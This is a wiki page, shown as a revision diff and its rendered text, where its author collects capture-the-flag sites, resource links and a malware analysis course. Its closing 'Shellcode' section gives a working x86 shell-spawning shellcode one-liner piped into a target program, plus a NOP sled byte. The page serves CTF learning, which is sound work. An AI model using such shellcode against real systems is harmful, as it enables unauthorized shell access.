Differences between revisions 5 and 20 (spanning 15 versions)
Revision 5 as of 2020-03-06 11:37:37
Size: 690
Editor: Sciuro
Comment:
Revision 20 as of 2020-06-06 14:48:20
Size: 1885
Editor: Sciuro
Comment:
Deletions are marked like this. Additions are marked like this.
Line 1: Line 1:
#acl All:read #acl CTFGroup:read,write,revert All:read
Line 3: Line 3:
CTF's are fun to do. I like to do some CTF's once in a while and I started to write an guide for the more special CTF's I did. = Public CTFs =
CTF's are fun to do. I like to do some CTF's once in a while and I started to write an guide for the more special CTF's I did. Current CTF's can be found on [[https://ctftime.org/ctfs|CTFtime.org]].
Line 5: Line 6:
|| Name || Level || Description || || '''Name''' || '''Level''' || '''Description''' ||
Line 10: Line 11:
These are handout's about CTF's I did in the past. It's your call if you want to see answers. More lists of CTF's can be found on the site of [[https://apsdehal.in/awesome-ctf/|Awesome CTF]], [[https://www.csoonline.com/article/3341318/top-tools-and-resources-for-running-a-capture-the-flag-competition.html|CSO]] and [[https://fareedfauzi.github.io/ctfonline/#|Fareed Fauzi]]. Feel free to send me other CTF's. <<MailTo(ctf AT sciuro DOT org)>>

= Helpfull rescources =
 * General techniques: [[https://ctf101.org/|ctf101.org]]
 * Tooling: [[https://github.com/zardus/ctf-tools]]
 * Shellcode: [[http://shell-storm.org/shellcode/]]

= Handouts =
These are handouts about CTF's I did in the past. It's your call if you want to see answers.
Line 13: Line 22:

= Lectures =
Not a CTF, but well worth for learning.

|| '''Name''' || '''Level''' || '''Description''' ||
|| [[https://class.malware.re/|UC Malware Analysis]] || ?? || Introduction to Malware Analysis and Reverse Engineering ||

= Shellcode =
== Shell ==
Spawn a shell:
{{{
(echo -en "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\n"; cat) | ./prog
}}}

== NOP ==
For a NOP Sled, add a lot of times:
{{{
\x90
}}}

Public CTFs

CTF's are fun to do. I like to do some CTF's once in a while and I started to write an guide for the more special CTF's I did. Current CTF's can be found on CTFtime.org.

Name

Level

Description

Over the wire

Beginner to expert

Starting from learning SSH to reverse engineering.

Pico CTF

Beginner to expert

A good CTF to learn working on *nix systems and way beyond.

Certified Secure

Beginner to expert

A dutch site about learning the basics.

More lists of CTF's can be found on the site of Awesome CTF, CSO and Fareed Fauzi. Feel free to send me other CTF's. <ctf AT sciuro DOT org>

Helpfull rescources

Handouts

These are handouts about CTF's I did in the past. It's your call if you want to see answers.

Lectures

Not a CTF, but well worth for learning.

Name

Level

Description

UC Malware Analysis

??

Introduction to Malware Analysis and Reverse Engineering

Shellcode

Shell

Spawn a shell:

(echo -en "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\n"; cat) | ./prog

NOP

For a NOP Sled, add a lot of times:

\x90

CTF (last edited 2020-06-06 15:19:40 by Sciuro)